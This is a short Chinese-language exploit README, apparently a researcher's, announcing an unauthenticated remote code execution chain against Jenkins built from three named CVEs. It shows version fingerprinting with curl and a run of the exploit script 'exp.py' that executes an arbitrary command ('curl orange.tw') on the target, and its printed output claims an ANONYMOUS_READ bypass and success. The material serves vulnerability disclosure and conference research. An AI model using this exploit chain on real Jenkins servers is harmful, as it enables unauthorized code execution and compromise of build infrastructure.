自 2017 年 5 月以来,Jenkins 一直没有未认证 RCE,但这就是那个例外!
它将 CVE-2018-1000861、CVE-2019-1003005 和 CVE-2019-1003029 串联起来,实现了一种更可靠、更优雅的未认证远程代码执行!
ANONYMOUS_READ 禁用
ANONYMOUS_READ 启用(或使用普通用户账户)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
以下是我 HITB AMS 2019 演讲的部分幻灯片:
